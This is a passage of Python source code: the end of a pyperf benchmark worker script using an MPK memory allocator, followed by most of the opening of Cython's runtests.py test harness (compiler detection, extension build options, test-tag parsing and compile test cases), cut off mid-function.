    del runner
    # Release this worker's MPK allocator state (mpkmemalloc).
    pymem_reset()
def dummyFunc(name):
    """No-op benchmark target; accepts and ignores ``name``."""
    return None
def main(params):
    """Run one benchmark worker thread per entry in ``params``.

    params -- mapping of activation name -> (unused) options dict; only its
              length (number of workers) and its keys (result labels) are used.
    Returns a dict mapping each activation name to a status string.
    """
    # Route all allocations through the MPK-aware allocator (mpkmemalloc).
    pymem_setup_allocators(0)
    gc.disable()
    workers = len(params) if (len(params) > 0) else 1
    # Warm-up run so pyperf's one-time setup cost is not charged to a worker.
    runner = pyperf.Runner(loops=1)
    runner.argparser.add_argument("--cases")
    runner.bench_func("Dummy init", dummyFunc, "main")
    del runner
    threads = []
    for i in range(workers):
        tname = 'Worker' + str(i)
        threads.append(threading.Thread(target=functionWorker, args=[tname, 1], name=tname))
    # NOTE(review): start() immediately followed by join() runs the workers
    # one after another, not in parallel — confirm this is intentional.
    for idx, thread in enumerate(threads):
        thread.start()
        thread.join()
    # Restore the default PKRU register state after all workers finish.
    pymem_reset_pkru()
    result = {}
    for activation in params:
        result[activation] = "Finished thread execution"
    process = psutil.Process(os.getpid())
    print((process.memory_info().rss) / 1024)  # resident set size, in KiB
    return (result)
if __name__ == '__main__':
    # Twelve dummy activations -> twelve sequential benchmark workers.
    out = main({'activation1': {}, 'activation3': {}, 'activation4': {}, 'activation2': {},
                'activation31': {}, 'activation33': {}, 'activation34': {}, 'activation32': {},
                'activation45': {}, 'activation46': {}, 'activation47': {}, 'activation48': {}})
    # Final process footprint after all workers have run.
    process = psutil.Process(os.getpid())
    print((process.memory_info().rss) / 1024)  # resident set size, in KiB
|
runtests.py | #!/usr/bin/env python
from __future__ import print_function
import atexit
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
# ---- Python 2/3 and interpreter-implementation compatibility shims ----

try:
    import platform
    IS_PYPY = platform.python_implementation() == 'PyPy'
    IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
    # Very old/unusual interpreters without platform introspection: assume CPython.
    IS_CPYTHON = True
    IS_PYPY = False

from io import open as io_open
try:
    from StringIO import StringIO
except ImportError:
    from io import StringIO  # doesn't accept 'str' in Py2

try:
    import cPickle as pickle
except ImportError:
    import pickle

try:
    import threading
except ImportError:  # No threads, no problems
    threading = None

try:
    from collections import defaultdict
except ImportError:
    # Minimal stand-in for collections.defaultdict on pre-2.5 interpreters.
    class defaultdict(object):
        def __init__(self, default_factory=lambda : None):
            self._dict = {}
            self.default_factory = default_factory
        def __getitem__(self, key):
            if key not in self._dict:
                self._dict[key] = self.default_factory()
            return self._dict[key]
        def __setitem__(self, key, value):
            self._dict[key] = value
        def __contains__(self, key):
            return key in self._dict
        def __repr__(self):
            return repr(self._dict)
        def __nonzero__(self):
            return bool(self._dict)

try:
    from unittest import SkipTest
except ImportError:
    # Old unittest without SkipTest: report skips on stderr instead of raising.
    class SkipTest(Exception):  # don't raise, only provided to allow except-ing it!
        pass
    def skip_test(reason):
        sys.stderr.write("Skipping test: %s\n" % reason)
else:
    def skip_test(reason):
        raise SkipTest(reason)

try:
    basestring
except NameError:
    basestring = str

WITH_CYTHON = True
CY3_DIR = None

from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
from distutils import ccompiler
# Files/directories queued for deletion at interpreter exit.
_to_clean = []

@atexit.register
def _cleanup_files():
    """
    This is only used on Cygwin to clean up shared libraries that are unsafe
    to delete while the test suite is running.
    """
    for path in _to_clean:
        if not os.path.isdir(path):
            try:
                os.remove(path)
            except OSError:
                pass
        else:
            shutil.rmtree(path, ignore_errors=True)
def get_distutils_distro(_cache=[]):
    """Build (once) and return a configured distutils Distribution object.

    The result is memoized in the mutable default ``_cache`` so repeated
    calls share a single instance.
    """
    if _cache:
        return _cache[0]
    # late import to accommodate for setuptools override
    from distutils.dist import Distribution
    distutils_distro = Distribution()
    if sys.platform == 'win32':
        # TODO: Figure out why this hackery (see http://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
        # BUG FIX: the original ran this find/remove/parse sequence twice in a
        # row (verbatim copy-paste), parsing the config files a second time
        # for no reason.  One pass is sufficient.
        config_files = distutils_distro.find_config_files()
        try:
            config_files.remove('setup.cfg')
        except ValueError:
            pass
        distutils_distro.parse_config_files(config_files)
    _cache.append(distutils_distro)
    return distutils_distro
# Maps a test tag (or test name) to the module that must be importable for
# tests carrying that tag to run; tests whose module is missing are excluded.
EXT_DEP_MODULES = {
    'tag:numpy': 'numpy',
    'tag:numpy_old': 'numpy',
    'tag:pythran': 'pythran',
    'tag:setuptools': 'setuptools.sandbox',
    'tag:asyncio': 'asyncio',
    'tag:pstats': 'pstats',
    'tag:posix': 'posix',
    'tag:array': 'array',
    'tag:coverage': 'Cython.Coverage',
    'Coverage': 'Cython.Coverage',
    'tag:ipython': 'IPython.testing.globalipapp',
    'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
    'tag:test.support': 'test.support',  # support module for CPython unit tests
}
def patch_inspect_isfunction():
    """Monkey-patch inspect.isfunction to also accept Cython compiled functions."""
    import inspect
    original = inspect.isfunction

    def isfunction(obj):
        if original(obj):
            return True
        return type(obj).__name__ == 'cython_function_or_method'

    # Keep a handle on the real implementation so it can be restored later.
    isfunction._orig_isfunction = original
    inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
    """Undo patch_inspect_isfunction(); a no-op when not currently patched."""
    import inspect
    missing = object()
    original = getattr(inspect.isfunction, '_orig_isfunction', missing)
    if original is not missing:
        inspect.isfunction = original
def def_to_cdef(source):
    '''
    Converts the module-level def methods into cdef methods, i.e.

        @decorator
        def foo([args]):
            """
            [tests]
            """
            [body]

    becomes

        def foo([args]):
            """
            [tests]
            """
            return foo_c([args])

        cdef foo_c([args]):
            [body]
    '''
    match_def = re.compile(r'def (\w+)\(([^()*]*)\):').match
    result = []
    emit = result.append
    skipping = False
    line_iter = iter(source.split('\n'))
    for line in line_iter:
        if not line.strip():
            emit(line)
            continue
        if skipping:
            # Drop the decorated def's body until the next dedented line.
            if line[0] == ' ':
                continue
            skipping = False
        if line[0] == '@':
            skipping = True
            continue
        m = match_def(line)
        if not m:
            emit(line)
            continue
        name, args = m.group(1), m.group(2)
        # Strip C type declarations: keep only the last word of each argument.
        args_no_types = ", ".join(a.split()[-1] for a in args.split(',')) if args else ""
        emit("def %s(%s):" % (name, args_no_types))
        line = next(line_iter)
        has_docstring = '"""' in line
        if has_docstring:
            # Copy the docstring verbatim into the def wrapper.
            emit(line)
            for line in line_iter:
                emit(line)
                if '"""' in line:
                    break
        emit(" return %s_c(%s)" % (name, args_no_types))
        emit('')
        emit("cdef %s_c(%s):" % (name, args))
        if not has_docstring:
            emit(line)
    return '\n'.join(result)
def exclude_extension_in_pyver(*versions):
    """Return an ext-filter excluding the extension on the given (major, minor) Python versions."""
    def check(ext):
        if sys.version_info[:2] in versions:
            return EXCLUDE_EXT
        return ext
    return check
def exclude_extension_on_platform(*platforms):
    """Return an ext-filter excluding the extension on the given sys.platform values."""
    def check(ext):
        return ext if sys.platform not in platforms else EXCLUDE_EXT
    return check
def update_linetrace_extension(ext):
    """Enable Cython line tracing on ``ext`` by defining CYTHON_TRACE."""
    macros = ext.define_macros
    macros.append(('CYTHON_TRACE', 1))
    return ext
def update_old_numpy_extension(ext):
    """Configure ``ext`` for numpy without forcing the 1.7 deprecation-API macro."""
    update_numpy_extension(ext, set_api17_macro=False)
def update_numpy_extension(ext, set_api17_macro=True):
    """Add numpy include dirs, the deprecation-API macro and npymath link info to ``ext``."""
    import numpy
    from numpy.distutils.misc_util import get_info

    ext.include_dirs.append(numpy.get_include())
    if set_api17_macro:
        ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))

    # We need the npymath library for numpy.math.
    # This is typically a static-only library.
    npymath_info = get_info('npymath')
    for attr in npymath_info:
        getattr(ext, attr).extend(npymath_info[attr])
def update_openmp_extension(ext):
    """Mark ``ext`` as an OpenMP build and attach the matching compiler/link flags.

    Returns the (modified) extension, or EXCLUDE_EXT when OpenMP cannot be
    used in this configuration.
    """
    ext.openmp = True
    if sys.platform == 'win32' and sys.version_info[:2] == (3, 4):
        # OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
        return EXCLUDE_EXT

    flags = OPENMP_CPP_COMPILER_FLAGS if ext.language == 'cpp' else OPENMP_C_COMPILER_FLAGS
    if flags:
        compile_flags, link_flags = flags
        ext.extra_compile_args.extend(compile_flags.split())
        ext.extra_link_args.extend(link_flags.split())
        return ext
    if sys.platform == 'win32':
        # MSVC gets its flag elsewhere (build_ext); keep the extension.
        return ext
    return EXCLUDE_EXT
def update_cpp11_extension(ext):
    """
    update cpp11 extensions that will run on versions of gcc >4.8
    """
    gcc_version = get_gcc_version(ext.language)
    if gcc_version:
        if float(gcc_version.group(1)) > 4.8:
            ext.extra_compile_args.append("-std=c++11")
        return ext

    clang_version = get_clang_version(ext.language)
    if clang_version:
        ext.extra_compile_args.append("-std=c++11")
        if sys.platform == "darwin":
            # Apple clang needs libc++ and a deployment target for C++11.
            ext.extra_compile_args.append("-stdlib=libc++")
            ext.extra_compile_args.append("-mmacosx-version-min=10.7")
        return ext

    # Neither gcc nor clang detected: exclude the C++11 test.
    return EXCLUDE_EXT
def get_cc_version(language):
    """
    finds gcc version using Popen
    """
    config_var = 'CXX' if language == 'cpp' else 'CC'
    cc = sysconfig.get_config_var(config_var) or ccompiler.get_default_compiler()
    if not cc:
        return ''

    # For some reason, cc can be e.g. 'gcc -pthread'
    cc = cc.split()[0]

    # Force english output
    env = os.environ.copy()
    env['LC_MESSAGES'] = 'C'
    try:
        p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
    except EnvironmentError:
        # Be compatible with Python 3
        warnings.warn("Unable to find the %s compiler: %s: %s" %
                      (language, os.strerror(sys.exc_info()[1].errno), cc))
        return ''
    _, output = p.communicate()
    return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
    """Return a regex match carrying the gcc version, or None when cc is not gcc."""
    return re.search(r"gcc version (\d+\.\d+)", get_cc_version(language))
def get_clang_version(language):
    """Return a regex match carrying the clang version, or None when cc is not clang."""
    return re.search(r"clang(?:-|\s+version\s+)(\d+\.\d+)", get_cc_version(language))
def get_openmp_compiler_flags(language):
    """
    As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
    (currently) check for other compilers.

    returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension,
    or None when OpenMP support is unknown/unavailable.
    """
    gcc_version = get_gcc_version(language)
    if not gcc_version:
        if sys.platform == 'win32':
            return '/openmp', ''
        else:
            return None  # not gcc - FIXME: do something about other compilers

    # gcc defines "__int128_t", assume that at least all 64 bit architectures have it
    global COMPILER_HAS_INT128
    COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60

    compiler_version = gcc_version.group(1)
    # BUG FIX: the original compared version components as *strings*
    # (['10', '1'] >= ['4', '2'] is False), so gcc >= 10 was wrongly treated
    # as lacking OpenMP support.  Compare numerically instead.
    if compiler_version and tuple(int(part) for part in compiler_version.split('.')) >= (4, 2):
        return '-fopenmp', '-fopenmp'
    # gcc older than 4.2: no OpenMP support (implicit None return).
# Use the user's default locale (affects subprocess-output decoding) if possible.
try:
    locale.setlocale(locale.LC_ALL, '')
except locale.Error:
    pass

COMPILER = None
# Set as a side effect of get_openmp_compiler_flags().
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')

# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()

# Maps a test tag to a callback that tweaks (or excludes) the distutils
# extension before it is built.
EXT_EXTRAS = {
    'tag:numpy' : update_numpy_extension,
    'tag:numpy_old' : update_old_numpy_extension,
    'tag:openmp': update_openmp_extension,
    'tag:cpp11': update_cpp11_extension,
    'tag:trace' : update_linetrace_extension,
    'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)),  # no %-bytes formatting
    'tag:no-macos': exclude_extension_on_platform('darwin'),
}
# TODO: use tags
VER_DEP_MODULES = {
    # tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
    # (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
    (2,7) : (operator.lt, lambda x: x in ['run.withstat_py27',  # multi context with statement
                                          'run.yield_inside_lambda',
                                          'run.test_dictviews',
                                          'run.pyclass_special_methods',
                                          'run.set_literals',
                                          ]),
    # The next line should start (3,); but this is a dictionary, so
    # we can only have one (3,) key.  Since 2.7 is supposed to be the
    # last 2.x release, things would have to change drastically for this
    # to be unsafe...
    (2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
                                           'run.test_raisefrom',
                                           ]),
    (3,): (operator.ge, lambda x: x in ['run.non_future_division',
                                        'compile.extsetslice',
                                        'compile.extdelslice',
                                        'run.special_methods_T561_py2'
                                        ]),
    (3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
                                          'run.yield_from_py33',
                                          'pyximport.pyximport_namespace',
                                          ]),
    (3,4): (operator.lt, lambda x: x in ['run.py34_signature',
                                         'run.test_unicode',  # taken from Py3.7, difficult to backport
                                         ]),
    (3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
                                             ]),
    (3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
                                         'run.py35_asyncio_async_def',
                                         'run.mod__spec__',
                                         'run.pep526_variable_annotations',  # typing module
                                         'run.test_exceptions',  # copied from Py3.7+
                                         ]),
}

# Extra include directories, CFLAGS and the ccache command, from the environment.
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
TEST_SUPPORT_DIR = 'testsupport'

# Target languages the test suite can compile for.
BACKENDS = ['c', 'cpp']

# The UTF-8 byte-order mark, decoded as a str for lstrip()-ing test lines.
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
def memoize(f):
    """Cache ``f``'s results per positional-argument tuple (stored on f._cache)."""
    sentinel = object()
    f._cache = {}

    def wrapper(*args):
        cached = f._cache.get(args, sentinel)
        if cached is sentinel:
            cached = f._cache[args] = f(*args)
        return cached

    return wrapper
@memoize
def parse_tags(filepath):
    """Parse the '# tag: value[,value...]' directive comments heading a test file.

    Returns a defaultdict(list) mapping directive name -> list of values.
    Only the first comment block is considered: parsing stops at the first
    non-comment line, or at the first blank/plain-comment line after any
    tags were collected.
    """
    tags = defaultdict(list)
    parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
    with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
        for line in f:
            # ignore BOM-like bytes and whitespace
            line = line.lstrip(UTF8_BOM_BYTES).strip()
            if not line:
                if tags:
                    break  # assume all tags are in one block
                else:
                    continue
            if line[0] != '#':
                break
            parsed = parse_tag(line)
            if parsed:
                tag, values = parsed.groups()
                # Encoding declarations look like directives but are not.
                if tag in ('coding', 'encoding'):
                    continue
                if tag == 'tags':
                    tag = 'tag'
                    print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
                if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
                    print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
                values = values.split(',')
                tags[tag].extend(filter(None, [value.strip() for value in values]))
            elif tags:
                break  # assume all tags are in one block
    return tags
# os.listdir, memoized: test directories are assumed not to change during a run.
list_unchanging_dir = memoize(lambda x: os.listdir(x))


@memoize
def _list_pyregr_data_files(test_directory):
    # Data files (and bad*.py fixtures) that pyregr tests need copied alongside them.
    is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
    return ['__init__.py'] + [
        filename for filename in list_unchanging_dir(test_directory)
        if is_data_file(filename)]
def import_ext(module_name, file_path=None):
    """Import a compiled extension module.

    With ``file_path`` the module is loaded directly from that file;
    otherwise it is imported by name after invalidating the import caches.
    """
    if file_path:
        import imp
        return imp.load_dynamic(module_name, file_path)
    try:
        from importlib import invalidate_caches
    except ImportError:
        pass
    else:
        invalidate_caches()
    return __import__(module_name, globals(), locals(), ['*'])
class build_ext(_build_ext):
    """distutils build_ext that applies test-runner compiler tweaks before building."""

    def build_extension(self, ext):
        # Best-effort tweaks; any failure falls back to the default build.
        try:
            try:  # Py2.7+ & Py3.2+
                compiler_obj = self.compiler_obj
            except AttributeError:
                compiler_obj = self.compiler
            if ext.language == 'c++':
                # This C-only warning flag is rejected by g++.
                compiler_obj.compiler_so.remove('-Wstrict-prototypes')
            if CCACHE:
                # Prefix the compile command with ccache when configured.
                compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
            if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
                ext.extra_compile_args.append('/openmp')
        except Exception:
            pass
        _build_ext.build_extension(self, ext)
class ErrorWriter(object):
    """File-like collector that parses Cython 'line:col: message' diagnostics."""

    match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match

    def __init__(self):
        self.output = []
        # Writing simply records the chunk; parsing happens lazily in _collect().
        self.write = self.output.append

    def _collect(self):
        collected = {'errors': [], 'warnings': []}
        for line in ''.join(self.output).splitlines():
            found = self.match_error(line)
            if not found:
                continue
            is_warning, lineno, column, message = found.groups()
            bucket = 'warnings' if is_warning else 'errors'
            collected[bucket].append((int(lineno), int(column), message.strip()))
        return [
            ["%d:%d: %s" % item for item in sorted(collected[kind])]
            for kind in ('errors', 'warnings')
        ]

    def geterrors(self):
        """Sorted, formatted error diagnostics."""
        return self._collect()[0]

    def getwarnings(self):
        """Sorted, formatted warning diagnostics."""
        return self._collect()[1]

    def getall(self):
        """Both lists: [errors, warnings]."""
        return self._collect()

    def close(self):
        pass  # ignore, only to match file-like interface
class Stats(object):
    """Aggregates per-metric test counts, total times and the slowest tests."""

    def __init__(self, top_n=8):
        # How many slowest tests to remember per metric.
        self.top_n = top_n
        self.test_counts = defaultdict(int)
        self.test_times = defaultdict(float)
        self.top_tests = defaultdict(list)

    def add_time(self, name, language, metric, t):
        """Record ``t`` seconds spent on ``name``/``language`` under ``metric``."""
        self.test_counts[metric] += 1
        self.test_times[metric] += t
        heap = self.top_tests[metric]
        # min-heap => pop smallest/shortest until longest times remain
        if len(heap) < self.top_n:
            heapq.heappush(heap, (t, name, language))
        else:
            heapq.heappushpop(heap, (t, name, language))

    @contextmanager
    def time(self, name, language, metric):
        """Context manager that times its body and records it via add_time()."""
        started = time.time()
        yield
        self.add_time(name, language, metric, time.time() - started)

    def update(self, stats):
        # type: (Stats) -> None
        """Merge another Stats object into this one."""
        for metric, t in stats.test_times.items():
            self.test_times[metric] += t
            self.test_counts[metric] += stats.test_counts[metric]
            heap = self.top_tests[metric]
            for entry in stats.top_tests[metric]:
                if len(heap) < self.top_n:
                    heapq.heappush(heap, entry)
                else:
                    heapq.heappushpop(heap, entry)

    def print_stats(self, out=sys.stderr):
        """Write a per-metric timing summary (slowest tests included) to ``out``."""
        if not self.test_times:
            return
        lines = ['Times:\n']
        for metric, t in sorted(self.test_times.items()):
            count = self.test_counts[metric]
            top = self.top_tests[metric]
            lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
                metric, t, count, t / count,
                ', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
        out.write(''.join(lines))
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
if sys.platform not in ['win32'] and self.add_embedded_test:
# Non-Windows makefile.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir, self.cleanup_workdir, stats=self.stats))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if skip_c(tags) and 'c' in languages:
languages = list(languages)
languages.remove('c')
elif 'no-cpp' in tags['tag'] and 'cpp' in self.languages:
languages = list(languages)
languages.remove('cpp')
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
from pythran import __version__ as pythran_version
pythran_ext = (
pythran.config.make_extension(python=True)
if pythran_version >= '0.9' or pythran_version >= '0.8.7'
else pythran.config.make_extension()
)
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
tests = [ self.build_test(test_class, path, workdir, module, tags, language,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list ]
return tests
    def build_test(self, test_class, path, workdir, module, tags, language,
                   expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
        """Create a single *test_class* instance in a per-language workdir.

        The working directory layout is workdir/<language>/<module>[_<preparse>]
        so that builds of the same module in different configurations never
        collide.
        """
        language_workdir = os.path.join(workdir, language)
        if not os.path.exists(language_workdir):
            os.makedirs(language_workdir)
        workdir = os.path.join(language_workdir, module)
        if preparse != 'id':
            # Each preparse variant of the same module gets its own directory.
            workdir += '_%s' % str(preparse)
        return test_class(path, workdir, module, tags,
                          language=language,
                          preparse=preparse,
                          expect_errors=expect_errors,
                          expect_warnings=expect_warnings,
                          annotate=self.annotate,
                          cleanup_workdir=self.cleanup_workdir,
                          cleanup_sharedlibs=self.cleanup_sharedlibs,
                          cleanup_failures=self.cleanup_failures,
                          cython_only=self.cython_only,
                          fork=self.fork,
                          language_level=self.language_level,
                          warning_errors=warning_errors,
                          test_determinism=self.test_determinism,
                          common_utility_dir=self.common_utility_dir,
                          pythran_dir=pythran_dir,
                          stats=self.stats)
def skip_c(tags):
    """Return True if this test must not be built as plain C.

    A test is C++-only either when it carries the 'cpp' tag or when its
    'distutils' options contain a 'language=c++' setting.
    """
    if 'cpp' in tags['tag']:
        return True

    # Use .get() so we never create a 'distutils' key as a side effect of
    # the lookup (tags may be a defaultdict).
    for dist_option in tags.get('distutils', ()):
        parts = dist_option.split('=')
        if len(parts) == 2 and parts[0].strip() == 'language' and parts[1].strip() == 'c++':
            return True
    return False
def filter_stderr(stderr_bytes):
    """Filter annoying warnings from output."""
    marker = b"Command line warning D9025"
    if marker not in stderr_bytes:
        return stderr_bytes
    # MSVC emits e.g.: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
    kept_lines = [line for line in stderr_bytes.splitlines() if marker not in line]
    return b'\n'.join(kept_lines)
class CythonCompileTestCase(unittest.TestCase):
    """Test case that compiles one Cython module without running it.

    An instance represents a single (module, language, preparse) build in its
    own working directory.  Subclasses (CythonRunTestCase etc.) add execution
    of the compiled extension on top of this compile step.
    """

    def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
                 expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
                 cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False,
                 fork=True, language_level=2, warning_errors=False,
                 test_determinism=False,
                 common_utility_dir=None, pythran_dir=None, stats=None):
        self.test_directory = test_directory
        self.tags = tags
        self.workdir = workdir
        self.module = module
        self.language = language
        self.preparse = preparse
        # Preparse variants get a distinct display name.
        self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
        self.expect_errors = expect_errors
        self.expect_warnings = expect_warnings
        self.annotate = annotate
        self.cleanup_workdir = cleanup_workdir
        self.cleanup_sharedlibs = cleanup_sharedlibs
        self.cleanup_failures = cleanup_failures
        self.cython_only = cython_only
        self.fork = fork
        self.language_level = language_level
        self.warning_errors = warning_errors
        self.test_determinism = test_determinism
        self.common_utility_dir = common_utility_dir
        self.pythran_dir = pythran_dir
        self.stats = stats
        unittest.TestCase.__init__(self)

    def shortDescription(self):
        return "compiling (%s%s) %s" % (self.language, "/pythran" if self.pythran_dir is not None else "", self.name)

    def setUp(self):
        # Adjust global compiler options for this test; remember the old
        # values so tearDown() can restore them.
        from Cython.Compiler import Options
        self._saved_options = [
            (name, getattr(Options, name))
            for name in ('warning_errors', 'clear_to_none', 'error_on_unknown_names', 'error_on_uninitialized')
        ]
        self._saved_default_directives = list(Options.get_directive_defaults().items())
        Options.warning_errors = self.warning_errors
        if sys.version_info >= (3, 4):
            Options._directive_defaults['autotestdict'] = False

        if not os.path.exists(self.workdir):
            os.makedirs(self.workdir)
        if self.workdir not in sys.path:
            sys.path.insert(0, self.workdir)

    def tearDown(self):
        # Restore the compiler options saved in setUp().
        from Cython.Compiler import Options
        for name, value in self._saved_options:
            setattr(Options, name, value)
        Options._directive_defaults = dict(self._saved_default_directives)
        unpatch_inspect_isfunction()

        try:
            sys.path.remove(self.workdir)
        except ValueError:
            pass
        try:
            del sys.modules[self.module]
        except KeyError:
            pass
        # Only clean up on success, unless cleanup was requested even for
        # failing tests.
        cleanup = self.cleanup_failures or self.success
        cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
        cleanup_lib_files = self.cleanup_sharedlibs and cleanup
        is_cygwin = sys.platform == 'cygwin'

        if os.path.exists(self.workdir):
            if cleanup_c_files and cleanup_lib_files and not is_cygwin:
                shutil.rmtree(self.workdir, ignore_errors=True)
            else:
                for rmfile in os.listdir(self.workdir):
                    if not cleanup_c_files:
                        # Keep generated C/C++ sources and annotation HTML.
                        if (rmfile[-2:] in (".c", ".h") or
                                rmfile[-4:] == ".cpp" or
                                rmfile.endswith(".html") and rmfile.startswith(self.module)):
                            continue

                    is_shared_obj = rmfile.endswith(".so") or rmfile.endswith(".dll")

                    if not cleanup_lib_files and is_shared_obj:
                        continue

                    try:
                        rmfile = os.path.join(self.workdir, rmfile)
                        if os.path.isdir(rmfile):
                            shutil.rmtree(rmfile, ignore_errors=True)
                        elif is_cygwin and is_shared_obj:
                            # Cygwin cannot delete loaded DLLs -- delete later.
                            _to_clean.append(rmfile)
                        else:
                            os.remove(rmfile)
                    except IOError:
                        pass

                if cleanup_c_files and cleanup_lib_files and is_cygwin:
                    # Finally, remove the work dir itself
                    _to_clean.append(self.workdir)

        if cleanup_c_files and os.path.exists(self.workdir + '-again'):
            # '-again' is the determinism-check directory, see compile().
            shutil.rmtree(self.workdir + '-again', ignore_errors=True)

    def runTest(self):
        self.success = False
        self.runCompileTest()
        self.success = True

    def runCompileTest(self):
        # Returns the path of the built extension module, or None for
        # error-only tests.
        return self.compile(
            self.test_directory, self.module, self.workdir,
